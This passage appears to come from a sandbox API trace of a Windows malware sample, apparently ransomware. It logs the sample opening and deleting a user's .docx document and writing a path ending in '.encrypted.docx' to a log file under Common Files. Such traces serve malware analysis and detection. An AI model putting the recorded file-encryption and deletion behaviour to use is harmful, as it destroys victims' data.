lpMsg=0x6ae83c) returned 0 [0036.936] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.936] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.936] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.936] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.936] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.936] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0036.936] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.936] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.936] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.936] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.936] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.937] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0036.937] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.937] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XTFgSi8S58kpp1FfY.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xtfgsi8s58kpp1ffy.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0036.937] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0036.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0036.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0036.937] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.937] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.937] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.937] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0036.937] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.937] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.937] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.938] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.938] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.938] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.938] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.938] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.938] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0036.938] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.938] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.938] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.938] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.938] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.938] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.938] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.938] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XTFgSi8S58kpp1FfY.docx", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XTFgSi8S58kpp1FfY.docx", lpFilePart=0x0) returned 0x3e [0036.938] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XTFgSi8S58kpp1FfY.docx", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x410244d0, ftCreationTime.dwHighDateTime=0x1d5ba52, ftLastAccessTime.dwLowDateTime=0x2bd81670, ftLastAccessTime.dwHighDateTime=0x1d54c89, ftLastWriteTime.dwLowDateTime=0x15b9bc80, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x793e, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="XTFgSi8S58kpp1FfY.docx", cAlternateFileName="XTFGSI~1.DOC")) returned 0x7c2100 [0036.939] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XTFgSi8S58kpp1FfY.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xtfgsi8s58kpp1ffy.docx")) returned 1 [0036.940] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x410244d0, ftCreationTime.dwHighDateTime=0x1d5ba52, ftLastAccessTime.dwLowDateTime=0x2bd81670, ftLastAccessTime.dwHighDateTime=0x1d54c89, ftLastWriteTime.dwLowDateTime=0x15b9bc80, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x793e, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="XTFgSi8S58kpp1FfY.docx", cAlternateFileName="XTFGSI~1.DOC")) returned 0 [0036.940] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0036.941] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.941] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0036.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0036.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0036.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0036.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0036.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0036.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0036.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0036.941] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0036.941] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0036.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0036.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0036.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.941] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0036.941] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0036.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0036.941] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0036.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0036.941] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0036.942] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0036.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0036.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0036.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0036.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0036.942] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0036.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0036.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0036.942] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0036.942] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.942] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0036.942] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.942] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0036.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0036.942] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0036.942] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0036.943] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x203a, lpOverlapped=0x0) returned 1 [0036.943] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0036.943] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x203a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0036.943] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0036.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab0010 | out: hHeap=0x770000) returned 1 [0036.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0036.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0036.943] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XTFgSi8S58kpp1FfY.encrypted.docx\r\n", cchWideChar=75, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 75 [0036.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4b) returned 0x7f3630 [0036.943] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XTFgSi8S58kpp1FfY.encrypted.docx\r\n", cchWideChar=75, lpMultiByteStr=0x7f3630, cbMultiByte=75, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\XTFgSi8S58kpp1FfY.encrypted.docx\r\n", lpUsedDefaultChar=0x0) returned 75 [0036.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0036.943] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0036.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0036.943] WriteFile (in: hFile=0x140, lpBuffer=0x7f3688*, nNumberOfBytesToWrite=0x4a, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f3688*, lpNumberOfBytesWritten=0x6aee3c*=0x4a, lpOverlapped=0x0) returned 1 [0036.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0036.943] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.943] CloseHandle (hObject=0x140) returned 1 [0036.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0036.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0036.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0036.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0036.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0036.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0036.944] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0036.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0036.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0036.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0036.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0036.945] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0036.945] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0036.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0036.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0036.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0036.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0036.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0036.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0036.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0036.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0036.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0036.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0036.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0036.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0036.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0036.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0036.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0036.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0036.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0036.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0036.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0036.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0036.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0036.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0036.945] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0036.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0036.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0036.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0036.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0036.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0036.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0036.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0036.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0036.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0036.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0036.946] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0036.946] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.946] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0036.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0036.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0036.946] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0036.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0036.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0036.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0036.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af3e8 [0036.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0036.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0036.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0036.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0036.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0036.946] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ccb8 [0036.946] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0036.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0036.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0036.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0036.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0036.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0036.947] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0036.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0036.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) 